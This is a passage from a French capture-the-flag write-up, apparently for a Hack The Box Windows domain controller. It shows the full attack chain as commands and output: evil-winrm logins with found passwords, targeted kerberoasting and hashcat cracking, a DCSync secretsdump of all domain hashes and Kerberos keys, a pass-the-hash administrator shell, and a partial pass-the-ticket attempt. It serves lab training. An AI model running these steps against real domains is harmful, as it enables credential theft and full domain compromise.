class="cl">emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl">emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">./nxc smb 10.10.11.42 -u <span class="s1">&#39;emily&#39;</span> -p <span class="s1">&#39;UXLCI5iETUsIBoFVTj8yQFKoHjXmb&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.42 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:administrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.42 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> administrator.htb<span class="se">\e</span>mily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-flag">User flag </h3><p>Finalement, on obtient le flag utilisateur grâce à Emily</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\e</span>mily<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\e</span>mily<span class="se">\D</span>esktop&gt; cat user.txt </span></span><span class="line"><span class="cl">3415.....de32 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="emily---ethan">Emily -&gt; Ethan </h3><p>On doit faire un kerberosting. D&rsquo;après le write-up, il y avait une manière plus simple de le faire grace a ce repo github qui fait toutes les etapes qu&rsquo;on a effectué à la main d&rsquo;un coup:</p> <blockquote> <p>git clone <a class="link" href="https://github.com/ShutdownRepo/targetedKerberoast" target="_blank" rel="noopener" >https://github.com/ShutdownRepo/targetedKerberoast</a></p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Depuis Emily evilWinrm</span> </span></span><span class="line"><span class="cl">. .<span class="se">\P</span>owerView.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Set-DomainObject -Identity Ethan -Set @<span class="o">{</span><span class="nv">serviceprincipalname</span><span class="o">=</span><span class="s1">&#39;fakeService/targetHost&#39;</span><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Depuis Kali</span> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/Downloads<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo ntpdate administrator.htb </span></span><span class="line"><span class="cl">2024-11-29 16:04:44.623613 <span class="o">(</span>-0500<span class="o">)</span> +25200.766571 +/- 0.493670 administrator.htb 10.10.11.42 s1 no-leap </span></span><span class="line"><span class="cl">CLOCK: <span class="nb">time</span> stepped by 25200.766571 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/Downloads<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ GetUserSPNs.py administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -request </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">hashcat -m <span class="m">13100</span> -a <span class="m">0</span> ethan_hash.txt ~/wordlists/rockyou.txt --optimized-kernel-enable --show leopold@leopold-ZenBook-UX434FAC-UX434FA </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>ethan<span class="nv">$ADMINISTRATOR</span>.HTB<span class="nv">$administrator</span>.htb/ethan*<span class="nv">$78</span>ac2707afa86369c7b7ac6481d4f104<span class="nv">$90702</span>b9d78c06a35af5186690e4534b9432409b6e97765e513071ac185c0547c06cb3a2bf9b7268791819e21671adc50267d2233c02f05a3528d9a3341a87a2f470a8b7cf56a3d326751f9def7e0ba074bc3898d2159339e52406c576ce48895c687ad7460ed922d25a7f311197ab8ba2dd2f407690371cea35ab9509f4323aef68705ff3a735d7a461691040e3f6cee60cf8872450c1915429bc741357983166310c5664995fbb6d2e94d555c8ecd59e01f951860d21da3adda55559976f5472be684af958d97e449d1359f5c21e24cd684a1b4db78ff6386b7b02dcecc7bec3bd3b073ac659d50f2e168563a99ff4e8a75460d653acc88eda530e4de755074de68faa776a437a45ce3a681e63edd36130040528f02bf655f8b2ef8fdac61d33c10c10573f4641551d55a950bc13ca30d4dbe622be89f6296f0d330352910d3df0d4c659408a422dbba104e64d3e061a9a182167250a3943ad22a24aceb2e7c51a2e76fc14125c88fb0990601a8f28b2ee96da6da4cf743800c7777e0549fa84d96504a8e250deeb266786714f9d3aa19fcb0f60cf60b788f6def223a11dfda0e0bbbbff61293d7c30925f7f743494f9950fd6684d6f60ab77494e726a75178cf7112b961665ea10213fbb40702faa66dcecd6c7be70738ee8d6e25bafc67962d7aa43cb4a36eb367ecffe26060cc38f411d26e41a3a37ea0d62e3be77d42daee37a277ac464d8b1e2b3d2b5587d2ef0bac76a15009361f4d5256be13b408617cf910a9faa14d1f7997fe85c51ee20f0977fd60381b815f0acff3cb3d4b6a1a6ff72f0d75d03190ed77c663cdd6cc2c11f87916456861d928554bc0cea4f2b05ea58afff209e19964ad6a5e69c2775a17645f61e39c24dd3b9705272580e72db2438ee10e26ce49cedcc6d40727d8d9eb839db1029fbe39d197208829689909afca82def5d5143bf5e80d7486bace7c1ce7364615030fe65555f03f8fc90791c3d3760feaa03e7e6c9b4654e80ccb1bc5803bb3735e17b3e025fccd1e510aff673cd9d17bb03d1ffd1a7ffaf60b730a619263ed6b67af39efff762026ef683e8b0d330c1f1da452383fab9acb9c652257b3400e2190f4603361cf61f7d187d15a71702bbc95eec7838de2ae64584e64d8ee59de45de529a913f473a52a312dd66b3645b1b0d001147ad744436b8cfdb72af6dc5defe880a6170c24ee592d53f3b8874678c202be3fdcc5b412b59b5800fcd25641bbb8e443f1b94f25c206a628ef448eb0d205b0cf7ec9c90374d53f20fff82be21a8002a6de850eeb67e16e0e6e0022ecaa54ef7ef46c0b0bf38d819c28863e1611d6112b08683ae1ac7c3cee339587b502e83369f27b7b445964fa6efb504fec49f0c5a319aa341273a50902ee8531e27b289afa18c617eaa5d806303d723045102267a39773e6da6e1e4949cf3fdcea35174107c6205feb621037c4dcb074a3b3684434ca2da040e93e981ad3f12e7bb106a9bc2824f5ac151556eaea4a97a972deb5da307d67938fe59:limpbizkit </span></span></code></pre></td></tr></table> </div> </div><p>On obtient les creds de Ethan:<code>limpbizkit</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">rpcclient -U <span class="s2">&#34;administrator.htb\ethan%limpbizkit&#34;</span> 10.10.11.42 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ldapsearch -x -H ldap://10.10.11.42 -D <span class="s2">&#34;ethan@administrator.htb&#34;</span> -w <span class="s2">&#34;limpbizkit&#34;</span> -b <span class="s2">&#34;DC=administrator,DC=htb&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Tentatives d&#39;ouvertur d&#39;un shell</span> </span></span><span class="line"><span class="cl">$ evil-winrm -i 10.10.11.42 -u ethan -p limpbizkit </span></span><span class="line"><span class="cl">$ wmiexec.py <span class="s1">&#39;administrator.htb/ethan:limpbizkit@10.10.11.42&#39;</span> </span></span><span class="line"><span class="cl">$ psexec.py <span class="s1">&#39;administrator.htb/ethan:limpbizkit@10.10.11.42&#39;</span> </span></span><span class="line"><span class="cl">$ dcomexec.py <span class="s1">&#39;administrator.htb/ethan:limpbizkit@10.10.11.42&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="secretsdump">Secretsdump </h3><p>On récupère le hash de l&rsquo;administrateur grâce au script secretsdump et aux droits de l&rsquo;utilisateur ethan.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">secretsdump.py -just-dc ethan:limpbizkit@10.10.11.42 -outputfile dcsync_hashes </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span>id:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using the DRSUAPI method to get NTDS.DIT secrets </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:1109:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:1110:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199::: </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9::: </span></span><span class="line"><span class="cl">DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Kerberos keys grabbed </span></span><span class="line"><span class="cl">Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 </span></span><span class="line"><span class="cl">Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2 </span></span><span class="line"><span class="cl">Administrator:des-cbc-md5:403286f7cdf18385 </span></span><span class="line"><span class="cl">krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648 </span></span><span class="line"><span class="cl">krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94 </span></span><span class="line"><span class="cl">krbtgt:des-cbc-md5:2c0bc7d0250dbfc7 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\o</span>livia:des-cbc-md5:bc2a4a7929c198e9 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:aes256-cts-hmac-sha1-96:de3afc157b17c25bf056296233cf23629c06aa2f19d414afbe0afe3da7d59835 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:aes128-cts-hmac-sha1-96:038498213933ca1f3d43b4d7f6b0a572 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\m</span>ichael:des-cbc-md5:07bf8f89c229c219 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:aes256-cts-hmac-sha1-96:c0e6eaa8e841c72e55ef6a938565403e27aa728f5397e75d8cae6cd3423957bd </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:aes128-cts-hmac-sha1-96:3e8b0ff2f07fd2178ec4d33f1ad0bc4b </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\b</span>enjamin:des-cbc-md5:4a4aa4e3bc5eab61 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mily:des-cbc-md5:804343fb6e0dbc51 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>than:des-cbc-md5:58387aef9d6754fb </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\a</span>lexander:des-cbc-md5:49ba9dcb6d07d0bf </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82 </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e </span></span><span class="line"><span class="cl">administrator.htb<span class="se">\e</span>mma:des-cbc-md5:3249fba89813ef5d </span></span><span class="line"><span class="cl">DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb </span></span><span class="line"><span class="cl">DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d </span></span><span class="line"><span class="cl">DC$:des-cbc-md5:f483547c4325492a </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span></code></pre></td></tr></table> </div> </div><h3 id="evil-winrm">Evil-winrm </h3><p>En utilisant le hash de l&rsquo;administrator on peut directement se connecter avec <code>evil-winrm</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ evil-winrm -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e -i 10.10.11.42 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 11/29/2024 10:54 PM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">8431.....8a6b </span></span></code></pre></td></tr></table> </div> </div><h3 id="pass-the-ticket-attack-ptt">Pass The Ticket Attack (PTT) </h3><p>PAS REUSSI, FINALEMENT PAS UTILE ?</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span>Administrator.ccache </span></span><span class="line"><span class="cl"><span class="c1">## On récupère un ticket</span> </span></span><span class="line"><span class="cl">getTGT.py ADMINISTRATOR.HTB/Administrator -aesKey 9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in Administrator.ccache </span></span></code></pre></td></tr></table> </div> </div>